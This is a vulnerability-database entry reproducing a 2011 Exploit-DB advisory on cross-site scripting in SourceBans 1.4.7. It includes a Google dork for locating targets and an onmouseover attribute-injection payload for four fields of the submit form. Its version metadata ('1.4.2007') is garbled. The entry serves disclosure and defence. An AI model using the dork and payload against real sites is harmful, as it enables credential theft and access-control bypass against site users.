SourceBans Version 1.4.7 XSS

vendor:

SourceBans

by:

Sw1tCh

8.3

CVSS

HIGH

Cross Site Scripting (XSS)

CWE

Product Name: SourceBans

Affected Version From: 1.4.2007

Affected Version To: 1.4.2007

Patch Exists: YES

Related CWE: N/A

CPE: a:sourcebans:sourcebans:1.4.7

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

SourceBans Version 1.4.7 XSS

SourceBans is vulnerable to a Cross Site Scripting Vulnerability (XSS) in which an attacker can execute scripts on a client side resulting in a bypass of access controls and or a credentials loss.

Mitigation:

Input validation and output encoding should be used to prevent XSS attacks.

Source

Exploit-DB raw data:

# Exploit Title: SourceBans Version 1.4.7  XSS
# Google Dork: inurl:"sourcebans/index.php?p=submit"
# Date: Feb. 9th 2011
# Author: Sw1tCh
# Software Link: http://www.sourcebans.net/
# Version: 1.4.7


Info:
SourceBans is an application for managing publicly the banned users for a Steam Server.  
 
#-= The Advisory =-
SourceBans is vulnerable to a Cross Site Scripting Vulnerability (XSS) in which an attacker can execute scripts on a client side resulting in a bypass of access controls and or a credentials loss.

#-= Example =-

http://<SITE>/sourcebans/index.php?p=submit

	- > BanIP =>  " onmouseover=prompt(928137) bad="
	- > Comments =>  " onmouseover=prompt(928137) bad="
	- > Name => " onmouseover=prompt(928137) bad="
	- > Email =>  " onmouseover=prompt(928137) bad="



 
#Disclosure Information:
- Vulnerability found and researched: January 18th 2011
- Vendor (SourceBans) contacted: January 18th 2011
	[ Time Reduced because Ops of IRC channel were dicks ] 
- Disclosed to Exploit-DB, Bugtraq and InterN0T: 





#Credits: Sw1tCh

#Shoutouts : gen0cide, Scruffy, Griff, D00dl3,